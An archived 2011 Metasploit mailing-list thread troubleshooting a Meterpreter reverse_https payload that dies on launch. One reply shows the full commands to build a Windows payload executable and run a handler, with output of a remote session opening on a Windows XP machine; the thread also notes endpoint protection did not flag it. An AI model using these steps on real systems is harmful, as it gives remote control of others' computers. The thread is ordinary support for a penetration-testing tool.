metasploit-framework March 2011 archive
Main Archive Page > Month Archives  > metasploit-framework archives
metasploit-framework: Re: [framework] Meterpreter Reverse_HTTPS

Re: [framework] Meterpreter Reverse_HTTPS dies

From: c0lists <lists_at_nospam>
Date: Thu Mar 03 2011 - 16:23:04 GMT
To: JOhn Mistikopoulos <mailtest1223133456@gmail.com>

make sure your LPORT is right, by default reverse_https connects to 8443.

i just tested with current svn and it worked.

chris@carnal0wnage:~/trunk$ ./msfpayload windows/meterpreter/reverse_https LHOST
=y.y.y.y X>demohttps.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_https
 Length: 369
Options: LHOST=y.y.y.y
chris@carnal0wnage:~/trunk$ file demohttps.exe
demohttps.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
chris@carnal0wnage:~/trunk$ ./msfconsole

      =[ metasploit v3.6.0-beta [core:3.6 api:1.0]
+ -- --=[ 647 exploits - 342 auxiliary
+ -- --=[ 257 payloads - 27 encoders - 8 nops
       =[ svn r11870 updated today (2011.03.03)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST y.y.y.y
LHOST => y.y.y.y
msf exploit(handler) > set LPORT 8443
LPORT => 8443
msf exploit(handler) > exploit

[*] Started HTTPS reverse handler on https://y.y.y.y:8443/
[*] Starting the payload handler...
[*] x.x.x.x:23735 Request received for /AyCku...
[*] x.x.x.x:23735 Staging connection for target yCku received...
[*] Patching Target ID yCku into DLL
[*] x.x.x.x:23736 Request received for /ByCku...
[*] x.x.x.x:23736 Stage connection for target yCku received...
[*] Meterpreter session 1 opened (y.y.y.y:8443 -> x.x.x.x:23736) at
Thu Mar 03 16:17:48 +0000 2011

meterpreter > sysinfo
Computer : COMPUTER
OS : Windows XP (Build 2600, Service Pack 3).
Arch : x86
Language : en_US
Meterpreter: x86/win32
meterpreter >

On Thu, Mar 3, 2011 at 4:00 AM, JOhn Mistikopoulos
<mailtest1223133456@gmail.com> wrote:
> I have tried numerous scenarios such as:
> 1. Middle proxy servers (more than 3 different web proxy software)
> 2. A single proxy server
> 3. No proxy server
> 4. Over the internet and locally (get the same error)
> 5. Tested with different service packs (WinXP SP1, SP3, Win7)
> 6. Tested with IE6, unpatched.
> 7. Tested with different user accounts and group policies.
> 8. Tested in Symantec and McAfee Endpoint protection (none marked it as a
> threat)
> 9. Tested without any AV protection or Firewall-IPS.
>
> When I run the payload (for example the "exe" file in an unprotected PC - no
> AV, no IPS) I got the its name on the task manager just for a while and then
> dies.
> HoweverI don't see any instance of iexplorer.exe running.
>
>
> On Wed, Mar 2, 2011 at 5:35 PM, HD Moore <hdm@metasploit.com> wrote:
>>
>> On 2/28/2011 6:13 AM, JOhn Mistikopoulos wrote:
>> > And then, the listener stops giving any other info.
>> > I went to the victim PC and realized that the payload exe had already
>> > dies.
>> > I couldn't see it on the task manager.
>> > Concurrently, I had been running wireshark.
>> > The two last packets were:
>> > 1. Victim => Listener (RST, ACK)
>> > 2. Listener => Victim (FIN, ACK)
>> >
>> > Finally I don't get any connections.
>> > Does anyone know how to fix this?
>>
>> Is there any network proxy/filter between the target and yourself? Is
>> the target running an endpoint protection product or HIPS? Is the target
>> process a user-process (IE) or a system process (assuming IE/user-land)?
>>
>> The reverse_https payload is finicky based on the WinInet profile of the
>> user running the code.
>>
>> -HD
>> _______________________________________________
>> https://mail.metasploit.com/mailman/listinfo/framework
>
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
>
>
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework